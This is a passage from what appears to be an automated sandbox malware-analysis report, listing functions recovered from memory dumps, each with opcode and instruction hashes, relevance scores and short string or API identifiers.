                              • Opcode Fuzzy Hash: 08a33e1c4589ba59d8a4e8a6935aeeb6e5ab7216ecf7d2f173b163679e574437
                              • Instruction Fuzzy Hash: 4441EB30F1020A9FD7189B79C854B6E7AE6BBC8B00F20C92DE616AB7C5CB719C458751
                              Function 012C6CD8 Relevance: 1.4, Strings: 1, Instructions: 135COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1760280627.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_12c0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: PH_q
                              • API String ID: 0-2397113591
                              • Opcode ID: 31a1229a6db7dc6245944d5fdb2ba494939e135b4ec1ad65be5a9ad95767800e
                              • Instruction ID: 719e2fc7106730fb9d6e64fd366980b77dcd72ea69a51e28be74a4394b71572a
                              • Opcode Fuzzy Hash: 31a1229a6db7dc6245944d5fdb2ba494939e135b4ec1ad65be5a9ad95767800e
                              • Instruction Fuzzy Hash: 1341FB30F102069FD7189F79C854B6E7AE2BBC8B04F248A2DE6269F3D5CB709C458751
                              Function 012CAC38 Relevance: 1.4, Strings: 1, Instructions: 116COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1760280627.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_12c0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: Hcq
                              • API String ID: 0-419967981
                              • Opcode ID: d1aa335670a51860a3cfedf212f17e8dc497e574fd765d217cd81dd35ac36a1f
                              • Instruction ID: 16658db1ce1f5f60eac85dcba2ff3307fb6774dd5014fd633874df11833373dc
                              • Opcode Fuzzy Hash: d1aa335670a51860a3cfedf212f17e8dc497e574fd765d217cd81dd35ac36a1f
                              • Instruction Fuzzy Hash: 5A4116313146198FC7199F28D81457A7FA6EF89710F0540AEFA55CB391EB34CC11CB91
                              Function 012C997B Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1760280627.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_12c0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: 4'_q
                              • API String ID: 0-2033115326
                              • Opcode ID: 5280fe15782d2f5b1f73d500e12742f130fccd027a4c459c009d75e69b7d9607
                              • Instruction ID: 40e62160cc6fd90c39cf8533428d0e79f3ab44368fdc3263642865434deb94f7
                              • Opcode Fuzzy Hash: 5280fe15782d2f5b1f73d500e12742f130fccd027a4c459c009d75e69b7d9607
                              • Instruction Fuzzy Hash: 6641673461010ADFCF159F69D898AAA3BB6FF88704F100169EA16CB3A1CB31DD81CB91
                              Function 079606A0 Relevance: 1.3, APIs: 1, Instructions: 47COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1777323500.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7960000_file.jbxd
                              Similarity
                              • API ID: CloseHandle
                              • String ID:
                              • API String ID: 2962429428-0
                              • Opcode ID: e8dbcc5fef31516f461a82f43f2117be51ea41518fc0d20a92b3942f0b42c785
                              • Instruction ID: 3e5e4cfbbd3250c11bf453a112640d0af7fd97bbd05c997152f955728d3bdc8b
                              • Opcode Fuzzy Hash: e8dbcc5fef31516f461a82f43f2117be51ea41518fc0d20a92b3942f0b42c785
                              • Instruction Fuzzy Hash: D51116B58003498FDB10DF99C545BEEBBF4AB48320F148559D969A7280D338A544CFA5
                              Function 079606A8 Relevance: 1.3, APIs: 1, Instructions: 47COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1777323500.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7960000_file.jbxd
                              Similarity
                              • API ID: CloseHandle
                              • String ID:
                              • API String ID: 2962429428-0
                              • Opcode ID: 65eb14c62632d9e4f5f1f621fb93e6957f567990543aecf609ed18de82c9ecbd
                              • Instruction ID: 0b47d0d902f6a313341afa3bb559795132afc8a0494814c776b70a1700b3feed
                              • Opcode Fuzzy Hash: 65eb14c62632d9e4f5f1f621fb93e6957f567990543aecf609ed18de82c9ecbd
                              • Instruction Fuzzy Hash: FF1136B58003499FCB10DF9AC585BEEBBF4EB48320F108459D959A7340D338AA44CFA5
                              Function 076D0F38 Relevance: 1.3, Strings: 1, Instructions: 34COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1776920335.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_76d0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: (cq
                              • API String ID: 0-301743287
                              • Opcode ID: 1ae225b77c793cd6256ebf803c5d48a675f7dc9a76d9dcf66b9743514d39bfa6
                              • Instruction ID: 74b7f4771168fe79183a84923ed920f1d0753c236aa5a7548694bbe5f9ba4a4a
                              • Opcode Fuzzy Hash: 1ae225b77c793cd6256ebf803c5d48a675f7dc9a76d9dcf66b9743514d39bfa6
                              • Instruction Fuzzy Hash: 0BF0E5327181641BD70966B9A424A2F7E9A9FD6610F58406BE906CB380CD248C0287F6
                              Function 012C0EE0 Relevance: 1.3, Strings: 1, Instructions: 27COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1760280627.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_12c0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: 8cq
                              • API String ID: 0-304758316
                              • Opcode ID: 356241048c32a11bcf49fd57a9e360a3511d926e1a1e039e58c2a9a263da0a36
                              • Instruction ID: 4d21dae1158749a59185093e336d59344dbadd93471baf29c6cc837fe1869134
                              • Opcode Fuzzy Hash: 356241048c32a11bcf49fd57a9e360a3511d926e1a1e039e58c2a9a263da0a36
                              • Instruction Fuzzy Hash: F0E06D75E10219DFCB00AB9ED84599EFBFCEF95210B11016BE209D7221C7B09A04CBE1
                              Function 076DCDEC Relevance: .6, Instructions: 552COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1776920335.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_76d0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8ae90e0f9e0f75c2c2500e82f876f2f220f7c021136b84a4195e1a98c9737883
                              • Instruction ID: f012e42655c64ee9214e55c625d5b480e36a855062fef4b31be674a3343edc4d
                              • Opcode Fuzzy Hash: 8ae90e0f9e0f75c2c2500e82f876f2f220f7c021136b84a4195e1a98c9737883
                              • Instruction Fuzzy Hash: 1E227D70F25215CFCB04FFB9E89965CBBB2AB88300F44896AD84AE7341EB385D55CB51
                              Function 076D2E18 Relevance: .5, Instructions: 528COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1776920335.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_76d0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6415328f3be2c4fca95fa12dee5a243ce69329bde944757f1638a90c2ea84baa
                              • Instruction ID: 45ef95204dd66fe0bc890bd24451b70c8fe32021c93f2024103efe0eea4c05f0
                              • Opcode Fuzzy Hash: 6415328f3be2c4fca95fa12dee5a243ce69329bde944757f1638a90c2ea84baa
                              • Instruction Fuzzy Hash: 06129E70B20225CFC708EB79C99491D77F6BF89608B5184A9D84ADB361DF39EC06CB52
                              Function 076DBF41 Relevance: .4, Instructions: 430COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1776920335.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_76d0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f0762b92e32def8b609d184c5d2cd5ffcd119526e9b38b2bac7810f0c55b8980
                              • Instruction ID: 546a9bb99c1da135fc2ce572ce1b31e097c74ca07ed30c3d0cd1f9a597c96fd4
                              • Opcode Fuzzy Hash: f0762b92e32def8b609d184c5d2cd5ffcd119526e9b38b2bac7810f0c55b8980
                              • Instruction Fuzzy Hash: D4E13470A183158FC304BB79D85962D7BF5AF89214F4189ADD8CAD7391EE389C06CB63
                              Function 076DB288 Relevance: .4, Instructions: 413COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1776920335.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_76d0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f0a9e88dcbf5bcd37164a6a3111e48c77bc349218d245af2d2d06e444898ebec
                              • Instruction ID: 3a4fe151c3cc524811a8b4059183edc64f048152d49854dc29fc9413ed61a31b
                              • Opcode Fuzzy Hash: f0a9e88dcbf5bcd37164a6a3111e48c77bc349218d245af2d2d06e444898ebec
                              • Instruction Fuzzy Hash: 1BE1B871E10215CBC704FBB9E49962D7BF6EF84204F81496DD88AE7344EE389C46C796
                              Function 012CC200 Relevance: .3, Instructions: 330COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1760280627.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_12c0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9839933a4fa595d72b960a71a5bd2474152214c692cddfbda970dfe219595cce
                              • Instruction ID: e8cac03c30d99d53dda80e8c77f9d6ba912244f369c2500e871b6de14486bc04
                              • Opcode Fuzzy Hash: 9839933a4fa595d72b960a71a5bd2474152214c692cddfbda970dfe219595cce
                              • Instruction Fuzzy Hash: DCB1B871B1012A9FD704FBB8E599A2E77B6ABC8204F518928D48DF3344EE385C56C763
                              Function 012C43F9 Relevance: .3, Instructions: 306COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1760280627.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_12c0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2ef5eb43d257f217ac5a0bda4deb40b59c97c726d22109147033e1d2174ca7d7
                              • Instruction ID: 4ba53f3fa75b07f0d7744ad29ba40e403e5d089eb9a4db7d00cf25ba768f0c6c
                              • Opcode Fuzzy Hash: 2ef5eb43d257f217ac5a0bda4deb40b59c97c726d22109147033e1d2174ca7d7
                              • Instruction Fuzzy Hash: 71D16935E102458FCB08DFACC89899EBBF6BF89710F198269E615AB361C735EC41CB50
                              Function 012C4518 Relevance: .2, Instructions: 243COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1760280627.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_12c0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c74b29cceaaabfc9f860ec1c82734108e975596421b2b264d517c2d7968bc34c
                              • Instruction ID: 5b50349cd2bc6eb77186961fd8b4fb70f047dd74a4d6c3b02f4b74135b326538
                              • Opcode Fuzzy Hash: c74b29cceaaabfc9f860ec1c82734108e975596421b2b264d517c2d7968bc34c
                              • Instruction Fuzzy Hash: 80A15A35E102548FCB09DF9CC99899EBBF6BF49710F1A8298E605AB362C731EC45CB50
                              Function 012CB59D Relevance: .2, Instructions: 223COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1760280627.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_12c0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a3887d9d3026e97f5da9c33041ef889bc57e903af26c9adabb349d8d4cf1b0a0
                              • Instruction ID: 68beee53b413df3e700f1ee5e26b0123ffc63d8acfcec20e8bc4c113a1dbc776
                              • Opcode Fuzzy Hash: a3887d9d3026e97f5da9c33041ef889bc57e903af26c9adabb349d8d4cf1b0a0
                              • Instruction Fuzzy Hash: 54219D72E293909FCB026F38D8653897FE99F7A220B0845AED505C73D2E5700E4E8792
                              Function 012C71D0 Relevance: .2, Instructions: 201COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1760280627.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_12c0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ce72735d63075b8c6fe47f36688211b8837e51269239e41304c2a6c2f4b854c9
                              • Instruction ID: 78c6ae4480ee98610420d703c69fff638b01af20b8076661ccd01f05536a7757
                              • Opcode Fuzzy Hash: ce72735d63075b8c6fe47f36688211b8837e51269239e41304c2a6c2f4b854c9
                              • Instruction Fuzzy Hash: E37107347202068FDB15DF68C899A6E7BE6AF59B00B1901A9EB16CB3A1DB70DC41CF51
                              Function 076DE9AD Relevance: .2, Instructions: 191COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1776920335.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_76d0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5363fc4141774c0b24ea905c81815a08c8ec74f39e0fec7e4193fe0288deab2b
                              • Instruction ID: 7b6b833078b1553658bec2848a85c8b889f658abe8e7dea936d7ce9dd79541f6
                              • Opcode Fuzzy Hash: 5363fc4141774c0b24ea905c81815a08c8ec74f39e0fec7e4193fe0288deab2b
                              • Instruction Fuzzy Hash: 1D513831F142168FD700FBB8D89566E7BB5AF84210F44856AD889E7386DE3C9C06C792
                              Function 076DE9E8 Relevance: .2, Instructions: 160COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1776920335.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_76d0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 954ef9149751816d5fc7691caf0e6aab296146bc1218933d0c809a61c247e107
                              • Instruction ID: 9dc2fd39886884a2adccb5c5760f0e276355f0c2ed8e117d6a6c3ede4c36d5a9
                              • Opcode Fuzzy Hash: 954ef9149751816d5fc7691caf0e6aab296146bc1218933d0c809a61c247e107
                              • Instruction Fuzzy Hash: 1651E971F102268BC704FBF9D98562E77F5EB88614F408939D889E7344EE38AC4687D2
                              Function 012C9650 Relevance: .2, Instructions: 151COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1760280627.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_12c0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5c32ffc62952cf3434a6449096f47b21d0b47fb9aee9d635e3500e4cde7a51a5
                              • Instruction ID: 829ae885680fe78543c2c9aaa1a94d27bdafd5490503745d968b35d21ebc8dd1
                              • Opcode Fuzzy Hash: 5c32ffc62952cf3434a6449096f47b21d0b47fb9aee9d635e3500e4cde7a51a5
                              • Instruction Fuzzy Hash: 4E517C74E1025EDFCF09CFA8C8449DDBFB2BF88304F108619EA06AB265D7759995CB50
                              Function 012C2FC3 Relevance: .2, Instructions: 150COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1760280627.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_12c0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 86c72c3da70a005c19e3b141d83fe5f47bf5410b1aabf4bc8eb5bb1f55a5b272
                              • Instruction ID: ce6a0a8ace557b913cbccf53211d6d4f3e07687975dcf8b793dad036bdb5ca75
                              • Opcode Fuzzy Hash: 86c72c3da70a005c19e3b141d83fe5f47bf5410b1aabf4bc8eb5bb1f55a5b272
                              • Instruction Fuzzy Hash: 2451CC32A102099FCB15CF68D844BAEBBF2FF88304F04C96EEA199B251D7759904CB51
                              Function 012CB6A0 Relevance: .1, Instructions: 148COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1760280627.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_12c0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 80ade46e227c4cdff78583ae161ca3bbd43219e47228b5a84375c0d4f6156292
                              • Instruction ID: c25b6c16fda8f6b2c92c78a9307008a889ff41f61bf2240151300ca8d78c7a90
                              • Opcode Fuzzy Hash: 80ade46e227c4cdff78583ae161ca3bbd43219e47228b5a84375c0d4f6156292
                              • Instruction Fuzzy Hash: 81B092318D42A8CBCF003BA0F80F32D3B2CAA007073205A25AA0A8A0208BE058308B63
                              Function 012C22E0 Relevance: .1, Instructions: 141COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1760280627.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_12c0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b7815713cdffe794cc5f6843d6fe96c666aa2217252a4527871e0661e850a9be
                              • Instruction ID: d94d3b48c215729c54fa5f3903b2544d7b2a503f7eeb1a7d3461824b83838130
                              • Opcode Fuzzy Hash: b7815713cdffe794cc5f6843d6fe96c666aa2217252a4527871e0661e850a9be
                              • Instruction Fuzzy Hash: B1419A30710216CFDB19AF79989863E7AA7BFC8700F14852DE646CB399DF748C828791
                              Function 012C49E8 Relevance: .1, Instructions: 128COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1760280627.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_12c0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ea27576553f501c0152f4e3125ca1e366e5ebc61bf0bcead9d12dd642539f529
                              • Instruction ID: 379599863ec16be4b284ccbafa3e1fa6074e344b535c03c9fd89115bac173d57
                              • Opcode Fuzzy Hash: ea27576553f501c0152f4e3125ca1e366e5ebc61bf0bcead9d12dd642539f529
                              • Instruction Fuzzy Hash: FC311331B143495FD71C6A3A9C68B7B7A9BBBC5620F14897EFA16CB3CADE3488054350
                              Function 076D1650 Relevance: .1, Instructions: 114COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1776920335.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_76d0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8e36cdaff7e89c007ca3c263cb49770d4c563217fd6584ac639754ab73ee8fa7
                              • Instruction ID: 1a0dd5b6834dd21ea334d5f4ec4c49e6d32d827e10aac7e8fecccac7ffe4b31f
                              • Opcode Fuzzy Hash: 8e36cdaff7e89c007ca3c263cb49770d4c563217fd6584ac639754ab73ee8fa7
                              • Instruction Fuzzy Hash: 65414C71D107099BDB18DFA9C48469DF7B1EF89310F15C629E80ABB360EB70AD85CB90
                              Function 076DB0EC Relevance: .1, Instructions: 104COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1776920335.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_76d0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 29954ad57d73557a9ee987506dc7309422f9a3505276709f69e61fedfe307999
                              • Instruction ID: 8e892a09cea7646f04cad557ca31e81b1214371a50c0f6b61d73472551ab1e4c
                              • Opcode Fuzzy Hash: 29954ad57d73557a9ee987506dc7309422f9a3505276709f69e61fedfe307999
                              • Instruction Fuzzy Hash: AE3148B1E187058BC701BBB9E86972D7BBAAF45204F4188A9DCC9CB295DE389C05C717
                              Function 012CC06D Relevance: .1, Instructions: 101COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1760280627.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_12c0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ceb2f8413921aebbae366d9a84488c40d924c54ca42ceec753aae1294c5716e0
                              • Instruction ID: 0d8f1771ffc6cb35af76304453145833aa66d54930d5fdfacacab287aa3d2d1a
                              • Opcode Fuzzy Hash: ceb2f8413921aebbae366d9a84488c40d924c54ca42ceec753aae1294c5716e0
                              • Instruction Fuzzy Hash: D331547191D3918FD307A7B8E8A82187FB1AF82200F0546DFE18CDB197DA784826C367
                              Function 012C4250 Relevance: .1, Instructions: 97COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1760280627.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_12c0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 13af65282dd2e393697c278b0429cd72b2fa690f0c13e751d0db6a3d8bb33ca4
                              • Instruction ID: 68bd870c89f2f88c2178a45d260e7247b408bacd8603f73d1fd9f0f425416bd2
                              • Opcode Fuzzy Hash: 13af65282dd2e393697c278b0429cd72b2fa690f0c13e751d0db6a3d8bb33ca4
                              • Instruction Fuzzy Hash: 8331DE31B002048FCB18AB78D818AAE7BB2BFC8610F14806DEA16DB394DF309C01CB91
                              Function 076D1050 Relevance: .1, Instructions: 97COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1776920335.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_76d0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 90ae8f755dab2428ee84783ef2fbe110576997103301f37b1cfed654cefa21a7
                              • Instruction ID: f147be607fd413cadf9dddd6381d952a826e0f8ffe5ec1e4ae8a4bf6bf488940
                              • Opcode Fuzzy Hash: 90ae8f755dab2428ee84783ef2fbe110576997103301f37b1cfed654cefa21a7
                              • Instruction Fuzzy Hash: B83147B1D103598FCF04DFA9D94469EBBF5BF89210F108429D816B7350DB789905CBA1
                              Function 076DE894 Relevance: .1, Instructions: 97COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1776920335.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_76d0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: bfe96744e7ed388559dce50060e7df29982df82d2dcc5d22d1aabb0a3444fa17
                              • Instruction ID: a6409138f3c4791dc05a2bf14ba473aac0c89f9f8583e1d144ad56440affe7f8
                              • Opcode Fuzzy Hash: bfe96744e7ed388559dce50060e7df29982df82d2dcc5d22d1aabb0a3444fa17
                              • Instruction Fuzzy Hash: A3313831A1A2508FD305777CEC5955DBFB5EF86214F4609AAD8C9DB292DE380C09C362
                              Function 012C67DB Relevance: .1, Instructions: 96COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1760280627.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_12c0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4d19a012e39d7f32065c0842ad0d62553b4d930e1f9bbefa3dd376e317f98e95
                              • Instruction ID: 684a2725ad44fb979027b8aebe6c4dbb222f085bff4a8e214dd898e2ac0866b9
                              • Opcode Fuzzy Hash: 4d19a012e39d7f32065c0842ad0d62553b4d930e1f9bbefa3dd376e317f98e95
                              • Instruction Fuzzy Hash: 78415B74A1020ADFDB04CFA5D498AAEBBF1FF48700F104169E505AB3A1DB75D944CB50
                              Function 012C13A8 Relevance: .1, Instructions: 95COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1760280627.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_12c0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 642bd9acc8e503ba35513369c7c491cb47586b87bc651a35a2903afc2f174f9e
                              • Instruction ID: 9fbec29ab9c3fa029febf13ac5b663c1ab4c4463836feaf1c9c37d75d0859fd8
                              • Opcode Fuzzy Hash: 642bd9acc8e503ba35513369c7c491cb47586b87bc651a35a2903afc2f174f9e
                              • Instruction Fuzzy Hash: 8331923521020ADFCB19AF64D854A6E7B62FF88714F00812DFA158B395CB74CC61DB91
                              Function 012C7468 Relevance: .1, Instructions: 89COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1760280627.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_12c0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a979d73badbb426a2286c1d35c5138e7cbd77458e2d33ebcad77a2d787108f8f
                              • Instruction ID: 6a2c7572028df19c29095c7e3e276ebaeedc4268661cde6f0c96c3f27b875198
                              • Opcode Fuzzy Hash: a979d73badbb426a2286c1d35c5138e7cbd77458e2d33ebcad77a2d787108f8f
                              • Instruction Fuzzy Hash: F9214B317243424BDB2A673DE45453D3A9B9FD5D84B04413DDB16CB3A6EA25CC42DB81
                              Function 012C7478 Relevance: .1, Instructions: 87COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1760280627.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_12c0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b05970abde7dda4a1f171349dfefa5c78e4d37c80c3a0fe6bd54ab8184a36f57
                              • Instruction ID: b399b6825148d63c295c7eeffef024efdf172b649c4b969c7ac8e9ed17d4b480
                              • Opcode Fuzzy Hash: b05970abde7dda4a1f171349dfefa5c78e4d37c80c3a0fe6bd54ab8184a36f57
                              • Instruction Fuzzy Hash: 752125303242024BDB2A672DE45473E769BDFC4E84F14813DDB16CB399EA66CC82DB81
                              Function 012C9883 Relevance: .1, Instructions: 86COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1760280627.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_12c0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2faa917dd63b14d4ca77d90ec8f126636c6cb1667dbb9da960371a6af4c7bab7
                              • Instruction ID: 988e20be2c19438333eed2bbf6e0f39b680d1ad0b8384999baa9810e1a4a2b88
                              • Opcode Fuzzy Hash: 2faa917dd63b14d4ca77d90ec8f126636c6cb1667dbb9da960371a6af4c7bab7
